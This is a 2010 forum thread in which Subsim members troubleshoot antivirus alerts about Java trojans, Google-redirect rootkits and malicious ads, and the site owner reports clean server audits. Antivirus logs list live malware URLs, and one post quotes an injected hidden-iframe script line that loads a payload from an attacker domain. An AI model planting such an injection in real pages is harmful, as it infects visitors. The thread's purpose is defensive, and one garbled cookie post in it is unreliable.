Today, when opening a normal page here, i got a warning of my anti-virus that the access would be denied because of a trojan virus and the java symbol pop-up has if I was enable the program.
Then, when going to google and search a website, it took a long time to do it and when I clicked in the first link it when strait to another completly difrent web page and my anti-virus went mad with all the trojans and etc.

After running the AV, it detected some trojan in the java program folder and other trojans in IE temp files, etc. After clean up, deleting all the temp files, running the av a few times in selected folders, noting.
After rebooting the pc, I went to google and see if every was fine. No, still the same thing.
Went looking for any thing similar on the web, read about it in the java site, cleaned the program cache, unistaled and reinstaled after reboot, etc.
But my google page is the same. Long times to do any search and the first click on any link sends me to a virus paradise.
Any one had some similar experience? Is the browser damage in any away? Im thinking of unistalling IE8 and then reinstall or install mozilla.

Any other access to sites is fine. MSN also, so it's not a slow internet connection.

PS: My antivirus is the NOD32, already runned ccleaner and spyboot!

What's the Virus identified as?

HunterICX

Maybe a root-kit

Try uninstalling java, and then visit a google link (without java). Does it still send you to a virus site?

Im thinking of unistalling IE8 and then reinstall or install mozilla.I'd install Firefox anyway (less vulnerability to viruses etc. being one of its advantages)

Starting in Safe Mode with Networking,to solve the problem

Starting in Safe Mode with Networking,to solve the problem

It's an idea. The anti-virus identifided this:
28-09-2010 18:56:53 HTTP filter file http://86.55.211.118/phxop001/l.php?i=2 a variant of Win32/Kryptik.GZK trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:43 HTTP filter file http://rezamaj.co.cc/CVMGCi8JNBdZDYVED6LSiDs60HzgPdJh?s=samba& a variant of Win32/Kryptik.EWF trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:34 HTTP filter file http://rezamaj.co.cc/client.zip Java/TrojanDownloader.Agent.NBU trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Application Data\Microsoft\Windows\shell.exe.
28-09-2010 18:07:07 HTTP filter file http://mneboras.com/mneboras9/files/bobbystellar.jar multiple threats connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.
28-09-2010 18:07:04 HTTP filter file http://mneboras.com/mneboras9/files/java.jar Java/Exploit.Agent.NAL trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.

Many of the virus were when google redirects me.

I did some search and it's a root-kit, and many people have/had this problem.. Downloaded the removal tool from kaspersky but didn't found anything. Then downloaded, installed and runned emsisoft anti-malware, but didn't found any thing.
Possibly do it again in safe mode.

It's an idea. The anti-virus identifided this:
28-09-2010 18:56:53 HTTP filter file http://86.55.211.118/phxop001/l.php?i=2 a variant of Win32/Kryptik.GZK trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:43 HTTP filter file http://rezamaj.co.cc/CVMGCi8JNBdZDYVED6LSiDs60HzgPdJh?s=samba& a variant of Win32/Kryptik.EWF trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\javaw.exe.
28-09-2010 18:19:34 HTTP filter file http://rezamaj.co.cc/client.zip Java/TrojanDownloader.Agent.NBU trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Application Data\Microsoft\Windows\shell.exe.
28-09-2010 18:07:07 HTTP filter file http://mneboras.com/mneboras9/files/bobbystellar.jar multiple threats connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.
28-09-2010 18:07:04 HTTP filter file http://mneboras.com/mneboras9/files/java.jar Java/Exploit.Agent.NAL trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Documents and Settings\Administrador\Definições locais\Temp\0.9025880865312967.exe.

I did some search and it's a root-kit. Downloaded the removal tool from kaspersky but didn't found anything. Then downloaded, installed and runned emsisoft anti-malware, but didn't found any thing.
Possibly do it again in safe mode. for clean an get rid of the prob.

http://www.f-secure.com/en_EMEA/security/tools/online-scanner/

Already did it. In a google support forum:
"then downloaded kaspresky malware tool and finally got rid of it what I found was, a rootkit that was called TDL3, it's the third generation of TDSS which uses rootkit technology to hide itself on a system by infecting drivers like atapi.sys, iastor.sys and a few others. Atapi.sys is a common target for this rootkit because it loads early during the boot process and is difficult to detect. Common symptons/signs of this infection include:Google redirection.Slowness of the computer and poor performance."

trying to get some removal tool that works. Also read that in one case, the "bad guy" was in the router. Could this happend with a modem?

Rhodes! To avoid this in the future so add, some add-on for firefox (if you use the browser) Noscript, Ad Block Plus, WOT, etc.

Possibly, but will try to fix this and use IE8. I do not have the certain thai it will not happen in firefox!

As long as you have a connection via the Internet, you can get it all down, at worst, therefore I propose real-time protection, update at least once per hour, which is necessary and if it has web scanning (remove viruses from web traffic), it is a plus,here is links for "bad thing"

http://www.bleepingcomputer.com/virus-removal/remove-tdss-tdl3-alureon-rootkit-using-tdsskiller

http://www.f-secure.com/weblog/archives/00001976.html

Yes, I'm in that sites reading, but the removal tool didn't find it. Will run it in safe mode to see if changes something. But I am begining to lose faith....


PS: Gentelmen, the bugger is terminated, killed, destroyed, obliterated!!!!!!! :/\\x:

I tried what many people said that had done the work, hitman 3.5 and it did. 3 things: the bugger made my IE access the net by a proxy server (possibly one specific to it) and the program deleted one shell.exe file and svchost.exe file also. After rebooting, went to google and had a normal and fast search and clicked on many sites, and it went there, no more virus paradise!

http://hitman-pro.en.softonic.com/ here's the link

It can be removed manually, also, by using the search,in the Start menu,

http://www.f-secure.com/en_EMEA/products/technologies/blacklight/

http://www.tizersecure.com/about_TDL3_rootkit_detect_remove.php

http://forum.sysinternals.com/rootkit-tdl-3_topic21266_page1.html

http://hitmanpro.wordpress.com/2010/05/03/microsoft-cures-260-000-tdl3-infections/

http://www.prevx.com/blog/155/x-TDL-rootkit--follow-up.html

Yes, I'm in that sites reading, but the removal tool didn't find it. Will run it in safe mode to see if changes something. But I am begining to lose faith....


PS: Gentelmen, the bugger is terminated, killed, destroyed, obliterated!!!!!!!

I tried what many people said that had done the work, hitman 3.5 and it did. 3 things: the bugger made my IE access the net by a proxy server (possibly one specific to it) and the program deleted one shell.exe file and svchost.exe file also. After rebooting, went to google and had a normal and fast search and clicked on many sites, and it went there, no more virus paradise!

http://hitman-pro.en.softonic.com/ here's the link :up:

Forgot to thank every one here for the help and support, :yeah::salute:Vendor!

We can take and a few beers in Funchal for the reasons you have solved your PC prob. :()1:

I had almost the same thing with Java, it effected firefox, every time I fired it up it tried to update some application, had to exit quickly, this was a while ago, I tried uninstalling firefox and reinstalling, fired it up and the same thing starts, both avira and ad-aware didn't find anything so I just saved my Outlook Express, game saves etc then re-ghosted my machine, best thing in the long run I reckon!:yep:

Same here, had a similiar malware that injected itself in some key system files mostly in the System32 folder so the virus just wouldn't die untill I did some heavy cleaning and restoring a bit frustrating and it really made me want to hurt people that create this kind of garbage.

HunterICX

And what they get paid, to develop PC infections

Ideed. But now, I opened this thread and got the same virus from the first time detected by nod32 and and java console pop up. But it's strange, subsim is not infected! I am not seeing any site apart from this.

PS: 29-09-2010 10:34:24 HTTP filter file http://drerlre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.
Its was this that appear!

:hmmm: Odd, seems there's some traces left that is enough to restore the whole Virus.

I would do the following -

Disconnect the Internet
Do a full clean sweep with the scanners you have installed, use the tools you can find to get rid of the specific virus.
(perhaps Uninstall JAVA again and reinstall later when you have internet restored and there's no traces to be found of the virus)
perhaps you might want to tighten your security (enable Windows Firewall)
restore internet connection.

btw are you using Firefox yet? if not get it and use the No-Script plug in.
also CCleaner is a nice tool, I use it everytime before I close down my PC so it's fresh at start up.

also on the bottom of this page are 2 links to fix the vulnerability in Java: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan%3AJava%2FMugademel.A&threatid=2147637327

HunterICX

No-Script is a good choice and firefox of course

Thanks. No, I still use IE8!

PS:Did a full scan with out my internet connection enable and notting. Scann with the program that erase the malware, noting also.

Came here and had the anti-irus pop up window about the same zip file trying to get in. I do not get it. For one view, this site has a java virus that etc,etc,etc. On the other hand, this never happend here and this forum is one of the safetest that I know.
Well, if it's detected and it do not enters my pc and infects, it's fine!
Damn those who invented such things...

Today when I log into SubSim I was told I needed to install Java ok never had that before.
And then the next time I went to log in My nod 32 antivirus software went crazy and warned me that this site was trying to send Trojans to my computer
What gives :nope:

my scanners have kept quiet and so did Java.
@Work : AVG
@Home : Avast

I think you ran into a malware that exploits the vulnerability of Java and infests it.
They just hit you at random, mostly through banners, ads and scripted advertising.

has NOD32 been able to identify the malware? and what web browser are you using?

EDIT: someone else on this forum caught the same problem when visiting a different website:
http://www.subsim.com/radioroom/showthread.php?t=175495

HunterICX

I Found this in my quarantine folder of Nod32it was never allowed to install :nope:


29/09/2010 …. drerlre.co.cc/client.zip… java/TrojanDownloader.agent.NBU trojan
29/09/2010 … drerlre .co.cc/1.zip ….. A variant of java/Mugade


(I removed the http:// to stop them being active links)


I connected using my Firefox browser :nope:

Edit ...... why did subsim ask for java to be installed in the first place ???

Nothing to do with SS but I upgraded a Java applet about a month ago and ended up having to reformat a machine :nope:

Nothing to do with SS but I upgraded a Java applet about a month ago and ended up having to reformat a machine :nope:



Hhmmm Ok but I just un-installed Firefox and ran some hitman software that found nothing but would not un-install again.
So Restored my machine to before today’s java up data check all was ok then started up IE 64bit version check around the sites I used no problems so far.
But opened the SubSim forum and you guessed it these pages use a version of java to view them NFW am I doing that again the pages load ok without it :nope:

I hit the red cross on the up-date and left the forum and just returned but the message did not re-appear :up:

I started getting this message this afternoon. Now it pops up everytime I touch this site, and ONLY this site.

http://img822.imageshack.us/img822/2881/viruswarning.jpg

I started getting this message this afternoon. Now it pops up everytime I touch this site, and ONLY this site.

http://img822.imageshack.us/img822/2881/viruswarning.jpg

HTTP cookie or first-party session cookies. These ARE temporary cookies set by the web site-being visited (the first-party). Cleared-when browser is closed.First-party persistent cookies. These ARE permanent cookies set by the web site-being visited (the first-party). They Are Permanently stored and Will Be retained eller Batch Their Requested expiration date and time when, or Batch They Are Manually deleted through sometime user action.Third-party session cookies. These ARE temporary cookies are not set by the the first-party, But Rather village sometime other "Third-party" web server. Third-party persistent cookies. These ARE permanent cookies That ARE stored Permanently, They Will Be retained or Batch They Are Manually deleted through sometime user action. These Are The worst of all cookies, Since They Are Typically planted Into a user's browser Without the user's knowledge, permission, or expectation, after Which Time Do They cannabis and ers, Used to track users across the Internet Compiling profiles of sites visited, search queries Used, and collecting all Manner of staff and private information. Flash cookies = an Entirely Different form of "cookie," That Is Not wrist village browser settings (by normal 'cookie' protocol) That Must Be dealt with by Entirely Different methods.Advertisers (and Other unscrupulous parties) Have managed to trick your browser Into Revealing information about you & your surfing habits (and more) with These 3rd party cookies (and Lately "flash cookies).These Are The Ones That Many anti-malware scans turn up as 'spyware' or Worse. You Should always blocks These, as They Are Hardly ever Needed by anyone. Settings ARE usually set your browser's 'Privacy' section.

seems that the drerlre.co.cc is the culprit...will notify Neal about this.

thank you Seawolf & JScones for the reports

HunterICX

Are usually seen in,
I looked at the scripts that were running, and someone snuck something into their /js/swfobject.js file:document.write('<iframe width=2 height=1 frameborder=0 src="http://drerlre.co.cc/zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza"></iframe>');

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AWin32%2FPdfjsc.IP&ThreatID=-2147328635

Use flashblock on almost every site,That redirects to a 404 now, and it looks like their swfobject.js has been fixed, but I'm assuming that was the culprit.

Just as it is, a culprit!

Yep. got the same message on entering subsim again. I think that is to do with some of the advertising. I think is this, since I got portuguese adverts

"http://pagead2.googlesyndication.com/pagead/imgad?id=COW2hKP2_YDuvAEQ1AMYPDIIr-5DB0kEKXo"

But nod says the the connection is terminated and so, possibly I am safe for the momment!

So vendor, I heard that you are buing the beers...:()1:

Yep. got the same message on entering subsim again. I think that is to do with some of the advertising. I think is this, since I got portuguese adverts

"http://pagead2.googlesyndication.com/pagead/imgad?id=COW2hKP2_YDuvAEQ1AMYPDIIr-5DB0kEKXo"

But nod says the the connection is terminated and so, possibly I am safe for the momment!

So vendor, I heard that you are buing the beers...:()1: you need "only" fly from Lisbon to Funchal, :yep:

Ok, I have hired a server security expert to check the server thoroughly and see what's up.

No problems on my end, both FF and Avast find nothing.

Ok, I have Scott setting up a full security check. I have not gotten any alerts from my Norton AV but when several people report this, I take it very seriously. Thanks! Will report back asap.

Neal

Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it :hmmm:

Ideed. But now, I opened this thread and got the same virus from the first time detected by nod32 and and java console pop up. But it's strange, subsim is not infected! I am not seeing any site apart from this.

PS: 29-09-2010 10:34:24 HTTP filter file http://drerlre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.
Its was this that appear!


Take a look in the Nod32 Quarantine folder you will see the files that tried to infect your machine thank god they weren’t opened.
My version of Nod32 also rejected the connection and install
Well it looks like Nod32 1 other virus software 0
I wonder how many people have been infected and don’t know it :nope:
I didn't see this thread so I opened this one

http://www.subsim.com/radioroom/showthread.php?t=175533

My avast was going bonkers too, only the main page of subsim forums.

Its strange how some did and some didn’t I wonder if its something to do with the rotation of the adverts maybe only one is infected :hmmm:

I Found this in my quarantine folder of Nod32it was never allowed to install :nope:


29/09/2010 …. drerlre.co.cc/client.zip… java/TrojanDownloader.agent.NBU trojan
29/09/2010 … drerlre .co.cc/1.zip ….. A variant of java/Mugade


(I removed the http:// to stop them being active links)


I connected using my Firefox browser :nope:

Edit ...... why did subsim ask for java to be installed in the first place ??? Java controls a crucial factor in the os, but if you add some add-on, and adjusts in configuring which sites you trust, then this is just a memory

As you see Nod32 did this for me
I wont ever have this problem again :up:

Good news, :yep:

Avast recognizes the trojan too, just went to the site mentioned (yes, I'm a bit nutty) and Avast started yelling "Avast! There be a scurvy man-o-war off yar starboard bow!" and aborted the connection. :yep:

OK, I have edited a piece of code that may have been causing this problem.

From this point in time forward, let me know here if this problem pops up. Details are helpful, thanks a buinch, guys. :salute:

I was wondering were this thread had gone...

But when replying to a pm I got the same warning again.
30-09-2010 18:18:39 HTTP filter file http://drejrre.co.cc/1.zip a variant of Java/Mugademel.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.

and

Emsisoft Anti-Malware - Version 5.0
IDS log
Date PID Source Event Behavior/Infection
30-09-2010 18:18:51 0 C:\DOCUMENTS AND SETTINGS\ADMINISTRADOR\DEFINIçõES LOCAIS\TEMP\JAR_CACHE7195392806923462976.TMP Quarantined by User Trojan-Downloader.Java.Agent!IK
30-09-2010 18:18:40 0 C:\DOCUMENTS AND SETTINGS\ADMINISTRADOR\DEFINIçõES LOCAIS\TEMP\JAR_CACHE1712967037496492837.TMP Quarantined by User Trojan-Downloader.Java.Agent!IK

I begining to think that my XP (or my AV/anti-malware software) does not like subsim...

I had attempted attack itself discovered now, but web scanning of network traffic was such that there, not was a problem no more

They are out there.... (X-files theme music now)

Hmmm, yes it seems to be a lot of beer until the matter is investigated :o

Hmmm, yes it seems to be a lot of beer until the matter is investigated :o

Indeed! Every first time that I log in to subsim, the bugger tries to get in.

Have you cleared your recent history including your cookies :hmmm:

Have you cleared your recent history including your cookies :hmmm:

Yes and it happens every time I connect for the first time in the day to subsim. Then after the block by the anti-virus, I do not have any messages again!

Is anyone else seeing this? My AV is not making a peep now.

I'm not getting it now. Did your security guy find a problem?

Yes, I just had my AV pop up again.

I had the same problem with Avast giving me malicious threat warnings when entering the site but all seems well now. No issues for the last couple of days. Looks like Subsims pest control cracked this one :up:.

Now was fine, no av pop up. May the bugger be gone forever!:salute:

Vendor will pays the beers...;)

I'm not getting it now. Did your security guy find a problem?

I am waiting for his report... for $100 an hour you would think they would put a little more steam into their engine :stare:

I'm still getting it on the Silent Hunter III subforum, but not anywhere else.

I am waiting for his report... for $100 an hour you would think they would put a little more steam into their engine :stare:


$100 an hour??????????:huh::huh::huh::huh::o

$100 an hour??????????:huh::huh::huh::huh::o

That is not that expensive...believe me.

IT gurus in the UK can charge even more.

Dam it its back This site requires java to view Monday 4th October
Not even going to try installing it and see what happens



I dont know if this helps but I was not log-in :hmmm:

Could you make a screenshot of that ''Need Java to view this site'' message the next time you get it?

HunterICX

It had't affected me, but I was aware of it from other posts from last week. And then when I open subsim.com this morning AVG picked up some trojan (or so it thought). No other signs though, and I'm clean!

Found the log:

Infection: Trojan horse Exploit_c.KGS

Object: c:\Users\tony\AppData\Local\Temp\plugtmp-5\plugin-zRvFF1uVxsmdOPg9FkYf9ADSZzKnKBza

Good luck Neal, hope it doesn't cost too much :nope:

Could you make a screenshot of that ''Need Java to view this site'' message the next time you get it?

HunterICX


If I get it again I will
Just for information I have just re-installed this computer and opened SubSim for the first time today although I have been on other site with no problem today.
Anyway I got the normal add plug in … flash player 10.1 which I always do BUT today it also asked me to add Java add-on also. :nope:

Hello,
since today i always get a red screen with a warning "Unsecure website", when trying to access the Subsim.com forum.
It happens all the time, even if being logged in, or just wanting to change to another topic, or subforum. Annoying, problems on my side / PC?

thanks and greetings,
Catfish

Check out this other thread...

http://www.subsim.com/radioroom/showthread.php?t=175495

I'm guessing it's all associated :nope:

Ignore this post, it's been merged and is irrelevent in this thread as it points to this thread.

Hello,
since today i always get a red screen with a warning "Unsecure website", when trying to access the Subsim.com forum.
It happens all the time, even if being logged in, or just wanting to change to another topic, or subforum. Annoying, problems on my side / PC?

thanks and greetings,
Catfish


What AV are you running? I have Norton with the latest updates and I am not seeing this.

Dam it its back This site requires java to view Monday 4th October
Not even going to try installing it and see what happens



I dont know if this helps but I was not log-in :hmmm:

That is not the same as a virus or trojan warning, mate. It simply means to view java on any website you need to have java installed.

Thank you for this information
But if you had not merged the Threads my first post would have been #24 of this post
Which maybe not as clear as it should be … first you get the message to install Java then when you return to the site all hell breaks out with my anti-virus.

Can I ask what you have added to the forum that now requires a java update because
This is only being asked for on your site since the first signs of the Trojans.
Surly you know if there is something new you have added that now requires or don’t require java
And as you have stated many sites use java but you don’t get a string of Trojans following the download.
It feels like a case of shooting the messenger here
So I will bow out of this thread :shifty:

You still have not said what your AV is. What browser are you using? I'm trying to see what the problem is but I need more information. I have the latest fully paid for version of Norton, and it is not indicating any problems.

And I am not being "touchy" about this, but you need to understand, if I cannot find anything wrong, if a professional IT guy canoot find anything wrong, then what do you expect me to do? For all I know, this could be a non-Subsim problem with Nod32 creating false positives. It has happened before. (http://www.nist.org/news.php?extend.267) Help me out here, I need proper reports! ;)

The Anti Virus program is Eset Smart Security Version 4.0.467.0 (Nod32)
The virus signature database is 5503 (20101004)

It has happened using both FireFox and IE

For all I know, this could be a non-Subsim problem with Nod32 creating false positives. It has happened before. (http://www.nist.org/news.php?extend.267) Help me out here, I need proper reports! ;)

The Anti Virus program is Eset Smart Security Version 4.0.467.0 (Nod32)
The virus signature database is 5503 (20101004)

It has happened using both FireFox and IE

Roger that, thanks! :salute:

Boggles the mind. :hmmm:

I've had no issues with either having to update Java nor the trojan we had earlier. Maybe this is a localised issue?

Avast & Firefox here.

Boggles the mind. :hmmm:

I've had no issues with either having to update Java nor the trojan we had earlier. Maybe this is a localised issue?

Avast & Firefox here.


That would be a good point except it only happened on Subsim forums
And not all the time its usually in the morning BST and then not for the rest of the day
Even if you clear your history and re-install nod32 it wont find anything until the next morning when you first enter the forum. :stare:

I will do a little test …. I will remove my anti virus and un-install all the browsers this
Will clear all log files then I will enter only Subsim forums until the pop appears and then I will report here if this happens. I will up data java and see what the result of this is this time. :stare:

Did a total restore of the machine IE. Formatted the hard drive re-installed windows installed system software including Nod32.
Installed firefox then opened Subsim it didn’t ask for a flash player update or the java
Update this time.
Also I see the adverts are not changing tonight :DL

I am getting the unsafe website popup that JScones posted with IE8 but not with Firefox.

Windows 7 just using Microsoft security essentials.

Hi Neal,

What AV are you running? I have Norton with the latest updates and I am not seeing this.

I am running HBEDV "Avira", SpyBot TeaTimer in the background, and occasionally use Ad-Aware, MalwareBytes and a2emergencykit, the latter only against trojans. No threats detected by any of the programs.

Using WinXP here, and IE 8; all updates installed. IE8 tells me that the "SmartSCreen Filter" has detected this site as unsafe.

It does not happen with Firefox version 3.5.6.

Greetings,
Kai

I wonder that if like me you have recently re-installed your Machine
And then when entering SubSim clicked “Yes” to installing flash player 10.1
And then you were asked to add the Java update if so this may explain a lot.
Because it looks like Subsim may have not Known that the link they offered to
Add this Flash Player link may have contained a little added program Please see below

http://img835.imageshack.us/img835/4839/captureflasplayer.png
(http://img835.imageshack.us/img835/4839/captureflasplayer.png)

That could be why some have seen this and a lot have not.

Edit ... if you clicked the link you would not of see this screen it would just of run the update opening the door to the trojans

Also I see the adverts are not changing tonight :DL

What ads? I don't have any ads. :doh: Only the amazon linky on top-right corner and the navyfield ad. This with both FireFox and IE, the latter being virtually untouched so I haven't blocked the ads.

One of the ads might be causing the issues. :hmmm:

What ads? I don't have any ads. :doh: Only the amazon linky on top-right corner and the navyfield ad. This with both FireFox and IE, the latter being virtually untouched so I haven't blocked the ads.

One of the ads might be causing the issues. :hmmm:

As I just stated the post above yours when you install flash player the adverts change but they dont now :up:

As I just stated the post above yours when you install flash player the adverts change but they dont now :up:

But I have Macromedia's flash player installed. :hmmm: Haven't had any other ads in awhile apart from the two I mentioned earlier.

But I have Macromedia's flash player installed. :hmmm: Haven't had any other ads in awhile apart from the two I mentioned earlier.

Yes as did I for a long time this has only started when I re-installed my machine last Thursday I think :up:

It's possible that the changes in whatever java the flash ads were running is triggering some AV, so I disabled it yesterday until the techs finish their work.

It's possible that the changes in whatever java the flash ads were running is triggering some AV, so I disabled it yesterday until the techs finish their work.

It looks like the prime suspect as nothing is showing today
And as you see from the above picture disabling it could well be the solution :up:

Hello,

6 p.m. here in Germany , all works now, no red screen anymore.

Seems it has something to do with the Java-pumped ads (?). I have written to MS (where this red unsafe screen obviously comes from) that the Website itself sure is not an unsafe one :)

Greetings,
Kai

Looks ok here too today. Fingers crossed.

I came here today and got the unsafe website warning again with IE8 but then after cleaning out my history and temp files it did not show up.



So...this was a website issue and my pc should not have been affected?


I ran a scan of my pc and it found nothing but I realize my AV isn't top-of-the-line. (MS Security Essentials)

I don't think there was an issue, there was something with the java script that was triggering some AV systems, not all of them. I checked all the forum files and none were "infected". I also replaced the forum system files with new copies, just to be sure. My tech finally sent in his report:

When we looked at your server and ran a shell scan nothing was found, everything looked good and we simply upgraded the rest of your system packages that were outdated. I can appreciate though that the delays are not good, our sales queue unfortunately is extremely low priority at the moment so will go ahead and close this ticket.

Since it took so long for him to get with me, I also hired the datacenter advance support to go through the server with a fine tooth comb:

Hello,
Our system administrators will begin the initial security audit and hardening for your server in 24 hours. During our initial audit our system administrators will do the following:
-Disable insecure services currently running and/or enabled
-Delete unnecessary user accounts
-Harden the SSH daemon (*nix systems)
-Secure mounted partitions
-Install and configure a software firewall (if you do not already have one installed or use an external firewall)
-Check running processes for insecure, unnecessary, or rogue processes
-Update the system kernel (*nix systems)
-Run a port scan to check for vulnerabilities
-Install and run a Rootkit check
-Run a system wide trojan detection task (including your forums)
-Update outdated services (this will vary depending on your current system configuration)
-Harden PHP by enabling SUHosin (This will not be performed unless you have cPanel, Plesk or DirectAdmin installed)
We will also perform ongoing security checks in maintenance which include:
Monitoring the Exim/Qmail queue
Perform audits with McAfee, Symantec, F-Secure, and Norton Anti-Virus systems.
Conducting Monthly Audits (similar to the initial audit described above)

***IMPORTANT***
If you have any custom applications running on the server (such as remote backup via CDP, a gaming server application, custom Apache configuration, etc. ) please reply to this ticket IMMEDIATELY so that our system administrators know about your custom software or configuration. This will allow us to configure our initial security audit to take your custom server configuration into account, ensuring that all of your applications continue to work correctly.
If we do not hear back from you within 24 hours, our administrators will assume that you have a default server configuration and would like all of the security precautions mentioned above enabled and/or installed on your server.
An initial audit report will be e-mailed to you once it has been completed. If you have any questions or comments please reply to this ticket. Thank you!
Regards,
Advanced Services Team
http://www.theplanet.com/

The server is clean, so I can't say what the problem was. I do appreciate the alerts, it's better to be safe than sorry.

Hello,
sorry but since yesterday, october 6th, the red screen is present again (Germany here).
Switching "off" the so-called smart screen filter in IE8, the red window does not come up. Switch the smart screen filter to "on", and the red window appears. Strange enough testing the site via smart screen filter tells me that the site is safe. And then the red window comes up again.

Seems the site has been added to a list at MS, don't know why though

Maybe a direct request at MS ?

Greetings,
Catfish

java download link is back

The problem is still with me ....!

http://img801.imageshack.us/img801/1040/bild003h.jpg (http://img801.imageshack.us/i/bild003h.jpg/)

Uploaded with ImageShack.us (http://imageshack.us)

I´ve since days the same Problem....!

Best regards,
Magic

G35Driver's forums have the same issue as above, definitely an Trojan.

Neal, here's the Trojan URL (as it seems to be quite hard to read from the above image):

\\91.188.60.234\public\photo1.jpg

Yep, its back and its in the ads.

91.188.60.234 server don’t look like that’s in America :o


http://img841.imageshack.us/img841/2518/ssrdirect.png


I wonder if that’s a members I.P also :hmmm:

Sagade Ltd is still evil
http://www.computersecurityarticles.info/security/sagade-ltd-is-still-evil/

I wish this would happen on my computer so I would know what you're talking about. How is this "in the ads"? What ads? Only in the forum? Which style? I removed the flash ad.

After reading the forum Dowly mentioned, I saw something about Google analytics, so I have removed that from SmartDark, and looked out the other styles. Please let me know if the problem persists.

10-9-10 update:
Hello Neal,

A virus scan on your account does not show anything suspicious:

root@server2 [/home/subsimc/public_html/radioroom]# find -type f -not -name "*.7z" -not -name "*.rar" -not -name "*.zip" | sed 's/ /\\ /g' | xargs clamscan -i
xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option

----------- SCAN SUMMARY -----------
Known viruses: 841714
Engine version: 0.96.3
Scanned directories: 0
Scanned files: 2347
Infected files: 0
Data scanned: 14.03 MB
Data read: 8.27 MB (ratio 1.70:1)
Time: 5.846 sec (0 m 5 s)

I am also unable to find any reference to the URL your client is complaining about or hidden functions that could provide a vector of attack in your site's code or database (except for thread 175495).

As such, the context clues suggest that they are suffering from a localized infection that will need to be removed using a virus scanner.

The only contraindication to this is that some browsers are reporting that the site is unsecure (though mine did not). If this continues, we'll need to exact URL that is causing the issue and the referring URL if they clicked through to your site so that we can attempt to reproduce the issue.

Regards,
Adam VanKirk
Systems Administrator, Advanced Services
RHCE, Security+


Anyone have the exact URL and referring URL mentioned above?

Avast reports the domain as "drerlre.co.cc"

Avast reports the domain as "drerlre.co.cc"

I have never seen the red screen but I have seen the trojan message for drerlre.
I do not click on anything to bring up the message to download it jumps out as soon as I enter the site.
a localized infection no something is tagged to this site through whatever means. checkout the advert to the left of the screen it changes with whatever browser you use. I don't mean the advert itself but the look of the border

Nope, can't be global issue as I and many others have no issue with the site.

Nope, can't be global issue as I and many others have no issue with the site.

Crap I hate it when you just have a rant and then you find a possible reason for it that is nothing to do with this site directly :nope:

Nope, can't be global issue as I and many others have no issue with the site.

May I ask if you have a bookmark saved for this site and if it go's to the forums direct if so what is the saved url address

Edit ... I don't mean what shows at the top of the page the save in your bookmarks url

May I ask if you have a bookmark saved for this site and if it go's to the forums direct if so what is the saved url address

Edit ... I don't mean what shows at the top of the page the save in your bookmarks url

http://www.subsim.com/radioroom/index.php

http://www.subsim.com/radioroom/index.php

I wonder :hmmm:

http://img163.imageshack.us/img163/278/sortcut.jpg

Tried that URL, it just redirects to:
http://www.subsim.com/index.php

Tried that URL, it just redirects to:
http://www.subsim.com/index.php

Exactly but if you watch the page open you will see for just a second another page opening before the re-direct it’s just a possibility perhaps :hmmm:

It's just a window notifying that:

"Subsim Forums converted to
vBulletin Sun May 28; Go here:
http://www.subsim.com/radioroom/"

Don't get me wrong, I am absolutely open to checking the forum for any problems, and will continue to do so, if the symptoms become more widespread. So far, though, two independent server techs (expensively) researched the forum, the domain, and server and no one has anything to report. I am also researching forums like the one Dowly listed and other vB forums for similar issues and how to detect a problem.

I'm not getting the alert anymore.

First does anyone use Malwarebytes full version and get this complaint while browsing in subsim.

I enabled the full version of Malwarebytes just few days back where online monitoring is enabled. Before that I was running the free version where online scanning is disabled. When ever I come into Subsim malwarebytes goes nuts!

comes up with this message while in subsim: Malwarebytes successfully blocked access to potentially malicious website 77.78.240.27 (tyqudaf.co.cc)

every link i click on it loads into page then i get the warning bells about 77.78.240.27. Then today malwarebytes blocks webpages on subsim!?? I was just in general clicked on a link and I get the RPOD (Red page of death <I just made that up see image below :)) I choose proceed anyway as I dont think subsim is sending out malware more a false then real.

But anyway I just spent the last 10min searching out the IP 77.78.240.27 it complains about thats connected with Subsim where its located as coming from Sarajevo, Bosnia and Herzegovina??

Malwarebytes is updated and is a trust worthy anti malware. But I think they have flunked on this one. Just wondering why the hell its going nuts.

blocked out!
http://img413.imageshack.us/img413/5729/1012201054715am.jpg

Target co-ordinates identified. Send stealth bombers to this destination

http://img843.imageshack.us/img843/8975/1012201061213amm.jpg

We got a thread about these trojans here (http://www.subsim.com/radioroom/showthread.php?t=175495&page=8). (Probably a good idea to rename the title to something trojan something :hmmm:)

That's now 3rd trojan that people have reported. Neal's two (expensive :O:) experts have scanned SS and found nothing.

Avast doesn't seem to recognise anything coming from the url you mentioned, seems like the account have been suspended so might be it just warns you as it has been a trojan site in the past. Firefox recognises the site as potentially harmful, tho.

